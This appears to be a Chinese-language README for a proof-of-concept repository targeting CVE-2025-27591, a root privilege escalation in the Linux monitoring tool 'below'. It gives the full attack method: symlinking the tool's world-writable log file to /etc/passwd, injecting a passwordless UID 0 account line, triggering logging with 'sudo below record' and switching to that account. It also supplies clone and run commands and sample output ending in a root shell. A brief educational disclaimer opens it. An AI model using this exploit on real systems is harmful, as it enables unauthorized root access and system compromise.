below 中通过符号链接滥用的权限提升🛑 免责声明:本利用程序仅供教育和授权的安全测试使用。未经授权使用可能违法。
below 是 Facebook 为 Linux 系统开发的一款性能监控工具。在修补版本发布之前的部分 below 版本存在一个严重漏洞,该漏洞通过利用全局可写日志目录和未经过滤的日志处理,允许非特权用户提升权限至 root。
| 字段 | 值 |
|---|---|
| CVE-ID | CVE-2025-27591 |
| 严重性 | 🔥 严重 (CVSS ≈ 7.8 - 8.8) |
| 攻击向量 | 本地 |
| 影响 | 权限提升至 root (UID=0) |
| 利用类型 | 符号链接滥用 / 日志文件注入 |
| 受影响应用 | below – 通常安装于 /usr/bin/below |
| 根本原因 | 对 /var/log/below/ 进行不安全的文件写入,未进行权限检查 |
此 Bash 脚本执行以下操作:
检查全局可写目录:
/var/log/below 是否全局可写(危险标志)。准备符号链接攻击:
error_root.log(如有),并创建指向 /etc/passwd 的符号链接。构建载荷:
/etc/passwd:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
触发日志记录:
sudo below record 强制易受攻击的二进制文件写入日志。获取 root 权限:
su fakeadmin 获取无需密码的 root shell。CVE-2025-27591/
├── exploit.sh
├── README.md
运行利用程序之前,请确保您具备以下条件:
/usr/bin/below/var/log/belowsudo below record 的 sudo 权限ln (创建符号链接)su (切换用户)timeout (控制执行时间)whoami (权限检查)# 1. 克隆仓库
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. 赋予脚本可执行权限
chmod +x exploit.sh
# 3. 执行利用程序
./exploit.sh
[*] 正在检查 CVE-2025-27591 漏洞...
[+] /var/log/below 是全局可写的。
[!] 发现现有日志文件:正在删除...
[+] 已创建符号链接:/var/log/below/error_root.log -> /etc/passwd
[*] 正在将恶意行写入 /tmp/fakeadmin
[*] 通过 'sudo below record' 触发日志记录...
[+] 'below record' 已执行(或已超时)
[*] 尝试通过符号链接将载荷写入 /etc/passwd...
[+] 有效载荷已成功追加。
[*] 尝试使用 'su fakeadmin' 切换到 root shell...
root@target:/# whoami
root